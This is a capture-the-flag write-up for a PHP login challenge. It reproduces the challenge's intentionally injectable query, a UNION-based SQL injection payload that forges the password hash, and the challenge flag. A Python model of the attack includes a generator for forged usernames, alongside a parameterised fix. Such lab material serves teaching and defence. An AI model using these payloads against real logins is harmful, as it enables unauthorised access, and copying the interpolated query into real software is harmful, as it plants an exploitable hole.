Challenge
View source
http://ctf5.shiyanbar.com/web/5/index.txt
The source is as follows (the challenge's own code; only the transcription was cleaned up and comments added to mark the relevant lines):

<html>
<head> welcome to simplexue </head>
<body>
<?php
if($_POST[user] && $_POST[pass]) {
    $conn = mysql_connect("********", "*****", "********");
    mysql_select_db("phpformysql") or die("Could not select database");
    if ($conn->connect_error) {
        die("Connection failed: " . mysql_error($conn));
    }
    $user = $_POST[user];          // taken verbatim from the request, no escaping
    $pass = md5($_POST[pass]);     // the submitted password is hashed, not the stored one
    $sql = "select pw from php where user='$user'";   // injection point: $user is interpolated into the query
    $query = mysql_query($sql);
    if (!$query) {
        printf("Error: %s\n", mysql_error($conn));
        exit();
    }
    $row = mysql_fetch_array($query, MYSQL_ASSOC);
    //echo $row["pw"];
    // strcasecmp() returns 0 when the strings match case-insensitively, hence the negation
    if (($row[pw]) && (!strcasecmp($pass, $row[pw]))) {
        echo "<p>Logged in! Key:************** </p>";
    } else {
        echo("<p>Log in failure!</p>");
    }
}
?>
<form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.txt">
</html>
The username is submitted via POST and concatenated unescaped into the query that fetches pw for that user.
Login succeeds when the fetched pw equals md5() of the submitted pass (compared case-insensitively with strcasecmp). Since the same injectable query supplies the value that the hash is compared against, we can make the query return a hash of our own choosing.
We can therefore construct the payload:
Username: 1' union select "098f6bcd4621d373cade4e832627b4f6" #
Password: test
098f6bcd4621d373cade4e832627b4f6 is the MD5 of test. The resulting query is select pw from php where user='1' union select "098f6bcd4621d373cade4e832627b4f6" #' : the # comments out the trailing quote, no user named 1 exists, so the only row returned is the injected one, and strcasecmp(md5('test'), $row[pw]) returns 0.
SimCTF {youhaocongming}
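The following is an added example, not part of the original writeup or the challenge code. It models the login check above in Python against an in-memory SQLite table so the union injection can be traced end to end, and contrasts it with a parameterised query. Everything in it is constructed: the table contents, the account name admin and its hypothetical password; the payload is adapted to SQLite syntax (single quotes around the injected hash and "-- " as the comment, where MySQL accepts "..." and #). forge_user() generalises the writeup's single payload to any attacker-chosen password.

```python
import hashlib
import sqlite3

# Constructed sample data (hypothetical account, not from the challenge).
LEGIT_USER = "admin"
LEGIT_PASS = "s3cret-admin-pw"  # only its MD5 is stored, as in the challenge


def md5_hex(s: str) -> str:
    """Same as PHP's md5(): lowercase hex digest."""
    return hashlib.md5(s.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the challenge's `php` table with columns user, pw."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE php (user TEXT, pw TEXT)")
    conn.execute("INSERT INTO php VALUES (?, ?)", (LEGIT_USER, md5_hex(LEGIT_PASS)))
    return conn


def build_query(user: str) -> str:
    """Same string interpolation as $sql = "select pw from php where user='$user'"."""
    return f"select pw from php where user='{user}'"


def check_pw(row, password: str) -> bool:
    """Mirrors ($row[pw]) && (!strcasecmp($pass, $row[pw])): case-insensitive hash compare."""
    if row is None or not row[0]:
        return False
    return md5_hex(password).lower() == row[0].lower()


def vulnerable_login(conn: sqlite3.Connection, user: str, password: str) -> bool:
    """The challenge's logic: the username can rewrite the query."""
    row = conn.execute(build_query(user)).fetchone()
    return check_pw(row, password)


def safe_login(conn: sqlite3.Connection, user: str, password: str) -> bool:
    """Parameterised variant: the username is data, it cannot change the SQL structure."""
    row = conn.execute("select pw from php where user=?", (user,)).fetchone()
    return check_pw(row, password)


def forge_user(chosen_password: str, missing_user: str = "1") -> str:
    """Build a username whose UNION makes the query return md5(chosen_password) as pw.

    missing_user must not exist in the table so the injected row is the only row,
    and therefore the row mysql_fetch_array() hands back.
    """
    return f"{missing_user}' union select '{md5_hex(chosen_password)}' -- "


if __name__ == "__main__":
    db = make_db()
    print(build_query(forge_user("test")))
    print("injected login:", vulnerable_login(db, forge_user("test"), "test"))
    print("same payload, parameterised:", safe_login(db, forge_user("test"), "test"))
```

The attacker controls both sides of the comparison: the submitted password is hashed, and the injected row supplies that same hash as pw. Because strcasecmp() is case-insensitive, an uppercase hex digest in the payload works just as well. With the parameterised query the forged username is looked up literally, no such user exists, and the check fails.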
strcasecmp() compares two strings case-insensitively and returns 0 when they match, which is why the check negates it.
mysql_fetch_array(result, result_type) fetches one row from the result set as a numeric and/or associative array.
result_type takes one of the following values (the code above uses MYSQL_ASSOC; the mysqli equivalents are MYSQLI_ASSOC, MYSQLI_NUM and MYSQLI_BOTH):
- MYSQL_ASSOC: associative array, keyed by column name
- MYSQL_NUM: numeric array, keyed by column index
- MYSQL_BOTH: both, keyed by column name and by index